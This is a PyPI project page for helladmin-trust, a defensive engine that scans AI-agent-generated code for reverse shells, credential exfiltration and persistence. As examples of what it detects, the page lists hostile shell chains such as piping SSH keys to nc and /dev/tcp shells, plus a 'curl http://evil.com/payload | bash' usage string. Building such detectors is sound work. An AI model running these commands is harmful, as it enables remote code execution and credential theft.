Trust analysis engine for AI agent skills — AST taint tracking, shell/JS pattern detection, drift analysis

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for airysen from gravatar.com airysen

Unverified details

These details have not been verified by PyPI
Meta
  • License Expression: Apache-2.0
    SPDX License Expression
  • Author: Arseniy Kustov
  • Requires: Python >=3.11
  • Provides-Extra: dev
Report project as malware

Project description

helladmin-trust

Trust analysis engine for HellAdmin — the AI agent firewall.

Detects malicious patterns in agent-generated code before execution. Ships with 27 pre-built chain rules (22 shell, 5 JavaScript) that catch real attack patterns: reverse shells, credential exfiltration, persistence mechanisms, supply chain attacks.

What it does

  • Shell chain detectioncurl | sh, cat ~/.ssh/id_rsa | nc, base64 -d | bash, cron persistence, /dev/tcp reverse shells
  • JS chain detectionprocess.env to fetch(), fs.readFile to HTTP POST, network input to code execution
  • Taint tracking — source (secret file, env var, network) to sink (code exec, network out, file write)
  • Drift analysis — detect when agent behavior changes between runs
  • Detonation scoring — rate skill danger before execution

Install

pip install helladmin

Trust is built into helladmin. No separate install needed.

Usage

from helladmin_trust.pattern_loader import load_patterns
from helladmin_trust.shell_analyzer import analyze_shell

patterns = load_patterns()
result = analyze_shell("curl http://evil.com/payload | bash", patterns)
# result.matched = [ChainMatch(name='pipe_to_shell', severity='critical', ...)]

Patterns

27 rules in trust-patterns-base.yaml:

Category Count Examples
Shell chains 22 pipe_to_shell, secret_exfil_pipe, base64_to_shell, cron_persistence, devtcp_reverse_shell
JS chains 5 env_to_fetch, fs_read_to_fetch, fetch_to_code_exec

Each rule defines a source type, sink type, regex patterns, severity, and description.

License

Apache 2.0

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for airysen from gravatar.com airysen

Unverified details

These details have not been verified by PyPI
Meta
  • License Expression: Apache-2.0
    SPDX License Expression
  • Author: Arseniy Kustov
  • Requires: Python >=3.11
  • Provides-Extra: dev

Release history Release notifications | RSS feed

This version

0.1.0a5 pre-release

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distributions

No source distribution files available for this release.See tutorial on generating distribution archives.

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

helladmin_trust-0.1.0a5-py3-none-any.whl (58.3 kB view details)

Uploaded Python 3

File details

Details for the file helladmin_trust-0.1.0a5-py3-none-any.whl.

File metadata

File hashes

Hashes for helladmin_trust-0.1.0a5-py3-none-any.whl
Algorithm Hash digest
SHA256 b98857ee3bcb42d6574c8e0a5b8fbdc7094ade250f72a62cddbfe442d43473a7
MD5 dd7635edb0cd14987b81bbbc52fc43da
BLAKE2b-256 311fd7dd1725e6d3d6550dc01c355a44930a0aa689b9b4072e9537a8b2fda500

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page